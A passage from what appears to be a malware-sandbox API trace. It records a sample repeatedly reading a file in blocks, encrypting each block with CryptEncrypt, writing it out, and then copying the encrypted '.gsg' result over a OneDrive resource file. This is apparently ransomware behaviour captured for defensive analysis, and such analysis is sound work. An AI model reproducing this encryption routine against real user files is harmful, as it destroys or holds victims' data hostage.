lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.838] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.838] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.838] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.839] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.839] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.839] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.839] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.839] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.840] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.840] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.840] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.841] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.841] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.841] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.841] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.842] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.842] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.842] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.842] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.843] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.844] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.844] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.844] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.844] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.844] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.844] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.845] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.845] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.845] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.845] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.845] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.845] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.845] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.845] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.846] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.846] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0271.846] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0271.846] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0271.847] CloseHandle (hObject=0x5d48) returned 1 [0271.847] CloseHandle (hObject=0x5d4c) returned 1 [0271.847] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0271.854] SetFileAttributesA 